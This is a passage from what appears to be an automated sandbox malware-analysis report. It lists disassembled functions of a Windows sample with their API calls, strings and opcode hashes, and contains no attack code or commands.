                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                    • Instruction ID: 3e5ea42c84cb4925b0de5092a1cf15d1344de85a4d52c0a863d6db2c66404f13
                    • Opcode Fuzzy Hash: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                    • Instruction Fuzzy Hash: A2514F71B00205BBDB18CF68DD89AAEBBB6FB89311F14822DF516D6290D7749D008B14
                    Function 0075201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007520D3
                    • KillTimer.USER32(-00000001,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0075216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 0078BEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF5A
                    • DeleteObject.GDI32(00000000), ref: 0078BF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                    • Instruction ID: 88023b7e3369f7b0aabd978791bccdbc300463d1838439231ea6b1f55058618f
                    • Opcode Fuzzy Hash: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                    • Instruction Fuzzy Hash: 1F619E31102610DFCB35AF14DD48BAAB7F1FF41312F108529E986879A1D7BDA896DF50
                    Function 007521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                    • GetSysColor.USER32(0000000F), ref: 007521D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
                    • Instruction ID: acdbe4cb752a358f373f4b4e0d497cf7cfb471f672f6dbdf994e5e4485c7ef69
                    • Opcode Fuzzy Hash: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
                    • Instruction Fuzzy Hash: 6641B1351011449BDB215F28EC88BF93B65FB07332F198266FD668A1E2C77A8C47DB61
                    Function 007BAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,007DF910), ref: 007BAB76
                    • GetDriveTypeW.KERNEL32(00000061,0080A620,00000061), ref: 007BAC40
                    • _wcscpy.LIBCMT ref: 007BAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
                    • Instruction ID: cec151861a0ba080fb8cd52260b8e1b1be3d14175529f5b9dd6243582b70ddae
                    • Opcode Fuzzy Hash: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
                    • Instruction Fuzzy Hash: 6D519D70208301EBC724EF54C895AEBB7A5FF84301F148829F996972E2DB79D949CA53
                    Function 00759997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 6d8d6136eaa8485cbd4c8680aef600a80b64e3705c67027444286504173ea5ad
                    • Instruction ID: c87137aafa47d02b058b69334f42613ad2e7bf0165c465b4f9537a3f8f9cbe1f
                    • Opcode Fuzzy Hash: 6d8d6136eaa8485cbd4c8680aef600a80b64e3705c67027444286504173ea5ad
                    • Instruction Fuzzy Hash: 5C410671614205EFDF24EF38DC46FBA73E8EB44300F20846EEA49D7281EA79A945CB11
                    Function 007D73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007D73D9
                    • CreateMenu.USER32 ref: 007D73F4
                    • SetMenu.USER32(?,00000000), ref: 007D7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7490
                    • IsMenu.USER32(?), ref: 007D74A6
                    • CreatePopupMenu.USER32 ref: 007D74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D74DD
                    • DrawMenuBar.USER32 ref: 007D74E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
                    • Instruction ID: e6c3e20f3f4f589de30df119eb5ac39dff6a05f99dd0b8fcb25ba6c38d6e5d13
                    • Opcode Fuzzy Hash: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
                    • Instruction Fuzzy Hash: D1415874A05245EFDB15DF64E884EDABBB9FF49310F14802AED5697360E738A920CB50
                    Function 007D772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007D77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 007D77D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007D77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 007D77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007D77FA
                    • DeleteDC.GDI32(00000000), ref: 007D7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 007D780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007D7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007D782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: fe597c3e1f009e57d8bbd3640aa7ba4501f9121cab542b731e67d5f30f83656d
                    • Instruction ID: 005aa33ef87617caa9841338484d45b8d20bb3fd4b2d5ff701976a0a4b6e3ef5
                    • Opcode Fuzzy Hash: fe597c3e1f009e57d8bbd3640aa7ba4501f9121cab542b731e67d5f30f83656d
                    • Instruction Fuzzy Hash: 8F316D31105219EBDF159FA4DC09FDA3B79FF09321F118226FA16A62A0D739D821DBA4
                    Function 00777040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0077707B
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    • __gmtime64_s.LIBCMT ref: 00777114
                    • __gmtime64_s.LIBCMT ref: 0077714A
                    • __gmtime64_s.LIBCMT ref: 00777167
                    • __allrem.LIBCMT ref: 007771BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007771D9
                    • __allrem.LIBCMT ref: 007771F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0077720E
                    • __allrem.LIBCMT ref: 00777225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00777243
                    • __invoke_watson.LIBCMT ref: 007772B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 8aa4718af0ed251f67180e8f8336bdae3396fbf4bd8ca56ff95dd5874227accb
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: B671F771A44707EBDB18AE79CC45B6AB3B8BF507A4F14C23AF518D6682E778D900C790
                    Function 007B2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007B2A31
                    • GetMenuItemInfoW.USER32(00816890,000000FF,00000000,00000030), ref: 007B2A92
                    • SetMenuItemInfoW.USER32(00816890,00000004,00000000,00000030), ref: 007B2AC8
                    • Sleep.KERNEL32(000001F4), ref: 007B2ADA
                    • GetMenuItemCount.USER32(?), ref: 007B2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 007B2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 007B2B64
                    • GetMenuItemID.USER32(?,?), ref: 007B2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
                    • Instruction ID: dee3fa73bb35f861feb99633efd6159870cbcdba681b9d9a054c1dc12e681c82
                    • Opcode Fuzzy Hash: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
                    • Instruction Fuzzy Hash: E4619FB0902249AFDB11CF64DC88EFF7BB8EB05304F148559E85297252EB39AD16DB21
                    Function 007D7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 007D723B
                    • _memset.LIBCMT ref: 007D724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D72D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                    • Instruction ID: ec9bf24cfd64cb6ec59cabe6ebaff50d952fc938fa7741dd3774c23ed1787713
                    • Opcode Fuzzy Hash: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                    • Instruction Fuzzy Hash: 85616A71900248AFDB10DFA4CC81EEE77B8FF09700F14416AFA55AB3A1E778A955DB60
                    Function 007A710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007A7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 007A718E
                    • VariantInit.OLEAUT32(?), ref: 007A71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 007A71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 007A7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 007A7227
                    • VariantClear.OLEAUT32(?), ref: 007A723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 007A7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A7252
                    • VariantClear.OLEAUT32(?), ref: 007A7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                    • Instruction ID: f1d4741962e4b8941472f66d02966a8289bb5606b29c76b24128692c7ba38128
                    • Opcode Fuzzy Hash: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                    • Instruction Fuzzy Hash: 8C413D35900219EFCB04DF64DC48AAEBBB8FF49354F00C169E956A7261CB78A945CFA0
                    Function 007C86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • CoInitialize.OLE32 ref: 007C8718
                    • CoUninitialize.OLE32 ref: 007C8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,007E2BEC,?), ref: 007C8783
                    • IIDFromString.OLE32(?,?), ref: 007C87F6
                    • VariantInit.OLEAUT32(?), ref: 007C8890
                    • VariantClear.OLEAUT32(?), ref: 007C88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 5917474063cc7242161dcd51e184c3038ddee0848b12a1affdcd1180b9f96d4e
                    • Instruction ID: 075018921f997d6537d5f103ac39327009e84f8a2c09953b20afe7f128f12d2a
                    • Opcode Fuzzy Hash: 5917474063cc7242161dcd51e184c3038ddee0848b12a1affdcd1180b9f96d4e
                    • Instruction Fuzzy Hash: C8617870608301EFD750DB64C848F6ABBE8AF89714F14491EF9859B291DB78ED48CB93
                    Function 007C5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 007C5AA6
                    • inet_addr.WSOCK32(?,?,?), ref: 007C5AEB
                    • gethostbyname.WSOCK32(?), ref: 007C5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 007C5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C5C00
                    • WSACleanup.WSOCK32 ref: 007C5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 917d3d44bd2496724df078d4004fb83b9ceb2b1d30bf9be4b2f2652ec91b5ce5
                    • Instruction ID: 1d330fcbf876e61e2b6cc1b9415f9b2071caebc822a2a9e16834419b0e15b793
                    • Opcode Fuzzy Hash: 917d3d44bd2496724df078d4004fb83b9ceb2b1d30bf9be4b2f2652ec91b5ce5
                    • Instruction Fuzzy Hash: CB516A71604701DFDB209F24C849F6ABBE4EB44310F14892EF956DB2A1DB79FC448B55
                    Function 007BB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BB7B1
                    • GetLastError.KERNEL32 ref: 007BB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 007BB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                    • Instruction ID: ff0cba0e87fb21518449493418a2e056f609604e1d8d76e820356dcf828760de
                    • Opcode Fuzzy Hash: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                    • Instruction Fuzzy Hash: 1E318235A00209DFDB04EF64CC89BEE77B8FF84710F14802AE902D7291DBB99946C791
                    Function 007A9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007A94F6
                    • GetDlgCtrlID.USER32 ref: 007A9501
                    • GetParent.USER32 ref: 007A951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9520
                    • GetDlgCtrlID.USER32(?), ref: 007A9529
                    • GetParent.USER32(?), ref: 007A9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                    • Instruction ID: 08724a79b6b88ac44402238014b6a691cca4d34018d1f3295fbd10bb39c97543
                    • Opcode Fuzzy Hash: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                    • Instruction Fuzzy Hash: 7B21A370D00104FBCF059B64CC89DEEBB75EF8A300F104216F962972E2DB7D9929DA20
